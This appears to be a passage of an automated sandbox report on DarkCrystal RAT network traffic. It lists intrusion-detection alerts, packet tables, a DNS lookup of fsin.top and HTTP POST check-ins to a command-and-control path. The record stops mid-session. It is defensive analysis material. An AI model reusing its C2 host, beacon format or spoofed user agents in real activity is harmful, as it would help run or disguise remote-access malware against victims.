                                                                                    2025-01-11T16:21:01.242843+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.46219637.44.238.25080TCP
                                                                                    2025-01-11T16:21:05.430363+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.46221837.44.238.25080TCP
                                                                                    2025-01-11T16:21:11.211605+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.46225437.44.238.25080TCP
                                                                                    2025-01-11T16:21:14.045793+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.46227037.44.238.25080TCP
                                                                                    2025-01-11T16:21:17.906639+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.46229537.44.238.25080TCP
                                                                                    2025-01-11T16:21:38.508513+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.46241037.44.238.25080TCP
                                                                                    2025-01-11T16:22:05.602307+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.46244737.44.238.25080TCP
                                                                                    2025-01-11T16:22:14.336703+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.46244837.44.238.25080TCP
                                                                                    2025-01-11T16:22:17.243019+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.46244937.44.238.25080TCP
                                                                                    2025-01-11T16:22:23.336697+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.46245037.44.238.25080TCP
                                                                                    2025-01-11T16:22:25.793218+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.46245137.44.238.25080TCP
                                                                                    2025-01-11T16:22:28.539834+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.46245237.44.238.25080TCP
                                                                                    2025-01-11T16:22:31.033553+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.46245337.44.238.25080TCP

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jan 11, 2025 16:20:13.180481911 CET4973080192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:20:13.186338902 CET804973037.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:20:13.186455965 CET4973080192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:20:13.187067032 CET4973080192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:20:13.192605019 CET804973037.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:20:13.544842958 CET4973080192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:20:13.550568104 CET804973037.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:20:13.831290007 CET804973037.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:20:13.961401939 CET804973037.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:20:13.961527109 CET4973080192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:20:14.133421898 CET4973080192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:20:14.256556034 CET4973080192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:20:25.695822954 CET4973780192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:20:25.700956106 CET804973737.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:20:25.701034069 CET4973780192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:20:25.701231003 CET4973780192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:20:25.706049919 CET804973737.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:20:26.055428982 CET4973780192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:20:26.060554981 CET804973737.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:20:26.330375910 CET804973737.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:20:26.445915937 CET4973780192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:20:26.459547043 CET804973737.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:20:26.530949116 CET4973780192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:20:43.453607082 CET6217253192.168.2.4162.159.36.2
                                                                                    Jan 11, 2025 16:20:43.458518982 CET5362172162.159.36.2192.168.2.4
                                                                                    Jan 11, 2025 16:20:43.458590984 CET6217253192.168.2.4162.159.36.2
                                                                                    Jan 11, 2025 16:20:43.463476896 CET5362172162.159.36.2192.168.2.4
                                                                                    Jan 11, 2025 16:20:43.922198057 CET6217253192.168.2.4162.159.36.2
                                                                                    Jan 11, 2025 16:20:43.927251101 CET5362172162.159.36.2192.168.2.4
                                                                                    Jan 11, 2025 16:20:43.927297115 CET6217253192.168.2.4162.159.36.2
                                                                                    Jan 11, 2025 16:20:52.224494934 CET6217580192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:20:52.229360104 CET806217537.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:20:52.229563951 CET6217580192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:20:52.229734898 CET6217580192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:20:52.234505892 CET806217537.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:20:52.586760998 CET6217580192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:20:52.591681004 CET806217537.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:20:52.859142065 CET806217537.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:20:52.946036100 CET6217580192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:20:52.987699032 CET806217537.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:20:53.134104013 CET6217580192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:20:53.361238956 CET6217580192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:00.510421038 CET6219680192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:00.515261889 CET806219637.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:00.515325069 CET6219680192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:00.515564919 CET6219680192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:00.520385981 CET806219637.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:00.868391037 CET6219680192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:00.873363018 CET806219637.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:01.161000967 CET806219637.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:01.242842913 CET6219680192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:01.291775942 CET806219637.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:01.383529902 CET6219680192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:04.713521004 CET6221880192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:04.718274117 CET806221837.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:04.718344927 CET6221880192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:04.718497992 CET6221880192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:04.723305941 CET806221837.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:05.071693897 CET6221880192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:05.076514006 CET806221837.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:05.373030901 CET806221837.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:05.430362940 CET6221880192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:05.505287886 CET806221837.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:05.585258007 CET6221880192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:10.440382004 CET6225480192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:10.445390940 CET806225437.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:10.445460081 CET6225480192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:10.445616961 CET6225480192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:10.450385094 CET806225437.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:10.789875031 CET6225480192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:10.794717073 CET806225437.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:11.083199024 CET806225437.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:11.211605072 CET6225480192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:11.212403059 CET806225437.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:11.350405931 CET6225480192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:11.636773109 CET6225480192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:13.232618093 CET6227080192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:13.237481117 CET806227037.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:13.237585068 CET6227080192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:13.237759113 CET6227080192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:13.242556095 CET806227037.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:13.586749077 CET6227080192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:13.591646910 CET806227037.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:13.900506973 CET806227037.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:14.045793056 CET6227080192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:14.045902014 CET806227037.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:14.204863071 CET6227080192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:17.117866993 CET6229580192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:17.123050928 CET806229537.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:17.127530098 CET6229580192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:17.127688885 CET6229580192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:17.132538080 CET806229537.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:17.477488041 CET6229580192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:17.482498884 CET806229537.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:17.776637077 CET806229537.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:17.906582117 CET806229537.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:17.906639099 CET6229580192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:18.129939079 CET6229580192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:37.736532927 CET6241080192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:37.741511106 CET806241037.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:37.741692066 CET6241080192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:37.741867065 CET6241080192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:37.746684074 CET806241037.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:38.086774111 CET6241080192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:38.091629028 CET806241037.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:38.419069052 CET806241037.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:38.508512974 CET6241080192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:21:38.567526102 CET806241037.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:21:38.654620886 CET6241080192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:04.867172003 CET6244780192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:04.872066021 CET806244737.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:04.872172117 CET6244780192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:04.872351885 CET6244780192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:04.877080917 CET806244737.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:05.227802038 CET6244780192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:05.232692957 CET806244737.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:05.536540985 CET806244737.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:05.602307081 CET6244780192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:05.667687893 CET806244737.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:05.711685896 CET6244780192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:05.729065895 CET6244780192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:13.657483101 CET6244880192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:13.662405968 CET806244837.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:13.662477970 CET6244880192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:13.662651062 CET6244880192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:13.667475939 CET806244837.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:14.008692980 CET6244880192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:14.014009953 CET806244837.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:14.291826010 CET806244837.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:14.336703062 CET6244880192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:14.423582077 CET806244837.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:14.477340937 CET6244880192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:14.530247927 CET6244880192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:16.560436964 CET6244980192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:16.565335035 CET806244937.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:16.565418959 CET6244980192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:16.565587997 CET6244980192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:16.570424080 CET806244937.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:16.915082932 CET6244980192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:16.920006037 CET806244937.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:17.193934917 CET806244937.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:17.243019104 CET6244980192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:17.323491096 CET806244937.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:17.367974043 CET6244980192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:17.389115095 CET6244980192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:22.641305923 CET6245080192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:22.646145105 CET806245037.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:22.646209955 CET6245080192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:22.646418095 CET6245080192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:22.651160955 CET806245037.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:22.993086100 CET6245080192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:22.997925043 CET806245037.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:23.293390989 CET806245037.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:23.336697102 CET6245080192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:23.427356958 CET806245037.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:23.477339983 CET6245080192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:23.582674026 CET6245080192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:24.996290922 CET6245180192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:25.001192093 CET806245137.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:25.001275063 CET6245180192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:25.001554012 CET6245180192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:25.006303072 CET806245137.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:25.352543116 CET6245180192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:25.357446909 CET806245137.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:25.657941103 CET806245137.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:25.793163061 CET806245137.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:25.793217897 CET6245180192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:25.881223917 CET6245180192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:27.832909107 CET6245280192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:27.837759972 CET806245237.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:27.837821007 CET6245280192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:27.837985039 CET6245280192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:27.842746973 CET806245237.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:28.196190119 CET6245280192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:28.201054096 CET806245237.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:28.494632959 CET806245237.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:28.539834023 CET6245280192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:28.629147053 CET806245237.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:28.680507898 CET6245280192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:29.166642904 CET6245280192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:30.261584997 CET6245380192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:30.266403913 CET806245337.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:30.266469955 CET6245380192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:30.266645908 CET6245380192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:30.271518946 CET806245337.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:30.618149042 CET6245380192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:30.623050928 CET806245337.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:30.921850920 CET806245337.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:31.033463955 CET806245337.44.238.250192.168.2.4
                                                                                    Jan 11, 2025 16:22:31.033552885 CET6245380192.168.2.437.44.238.250
                                                                                    Jan 11, 2025 16:22:31.240111113 CET6245380192.168.2.437.44.238.250

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jan 11, 2025 16:20:12.809001923 CET5005153192.168.2.41.1.1.1
                                                                                    Jan 11, 2025 16:20:13.172413111 CET53500511.1.1.1192.168.2.4
                                                                                    Jan 11, 2025 16:20:43.452981949 CET5360183162.159.36.2192.168.2.4
                                                                                    Jan 11, 2025 16:20:43.944248915 CET53547651.1.1.1192.168.2.4

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Jan 11, 2025 16:20:12.809001923 CET192.168.2.41.1.1.10x1a98Standard query (0)fsin.topA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Jan 11, 2025 16:20:13.172413111 CET1.1.1.1192.168.2.40x1a98No error (0)fsin.top37.44.238.250A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • fsin.top

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.44973037.44.238.250808004C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 11, 2025 16:20:13.187067032 CET309OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                    Host: fsin.top
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Jan 11, 2025 16:20:13.544842958 CET344OUTData Raw: 05 01 04 07 06 0c 04 02 05 06 02 01 02 06 01 0b 00 02 05 0e 02 04 03 00 02 02 0a 05 06 54 01 07 0e 07 04 5e 02 51 05 04 0b 01 06 01 05 0a 07 04 06 01 0f 0f 0f 04 07 00 07 0e 06 02 04 00 05 0e 03 00 0c 0a 04 07 04 09 0e 50 0f 07 0a 05 0c 53 07 56
                                                                                    Data Ascii: T^QPSV[\L~k`rOt}u[tkU}t|l~p`{ldY{`_^}msTwtwZ~O~V@Bz}r}rW
                                                                                    Jan 11, 2025 16:20:13.831290007 CET25INHTTP/1.1 100 Continue
                                                                                    Jan 11, 2025 16:20:13.961401939 CET376INHTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Sat, 11 Jan 2025 15:20:13 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 213
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    1192.168.2.44973737.44.238.25080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 11, 2025 16:20:25.701231003 CET326OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                    Host: fsin.top
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Jan 11, 2025 16:20:26.055428982 CET344OUTData Raw: 00 00 04 04 06 0a 01 03 05 06 02 01 02 01 01 0b 00 07 05 0d 02 0d 03 0e 02 0f 0c 06 06 0e 01 08 0e 02 04 5a 03 05 06 57 0e 03 07 07 07 01 07 51 06 01 0f 01 0f 52 04 06 07 05 04 06 06 52 04 0a 00 05 0c 0c 04 02 05 51 0d 07 0b 02 0e 0d 0b 07 02 05
                                                                                    Data Ascii: ZWQRRQY[PWT\L}R`y^tbj\aKQRlaBtR||psXxgJ{`jC^N`g|~O~V@z}fbi
                                                                                    Jan 11, 2025 16:20:26.330375910 CET25INHTTP/1.1 100 Continue
                                                                                    Jan 11, 2025 16:20:26.459547043 CET376INHTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Sat, 11 Jan 2025 15:20:26 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 213
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    2192.168.2.46217537.44.238.25080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 11, 2025 16:20:52.229734898 CET273OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                    Host: fsin.top
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Jan 11, 2025 16:20:52.586760998 CET344OUTData Raw: 00 02 04 04 06 0a 01 05 05 06 02 01 02 01 01 05 00 04 05 09 02 06 03 0b 03 05 0d 51 07 01 00 03 0f 54 03 0a 02 53 07 03 0b 01 04 07 05 56 07 51 04 50 0b 0c 0f 02 05 00 04 55 06 07 05 52 05 5f 03 02 0f 0b 04 00 06 53 0c 05 0d 02 0c 05 0d 00 06 07
                                                                                    Data Ascii: QTSVQPUR_S^XU\L}U|cfM`LubeZ|Bz\tl|B|]wZxRUo^vh}|wgk_~_~V@{STN}\}
                                                                                    Jan 11, 2025 16:20:52.859142065 CET25INHTTP/1.1 100 Continue
                                                                                    Jan 11, 2025 16:20:52.987699032 CET376INHTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Sat, 11 Jan 2025 15:20:52 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 213
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    3192.168.2.46219637.44.238.25080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 11, 2025 16:21:00.515564919 CET308OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                    Host: fsin.top
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
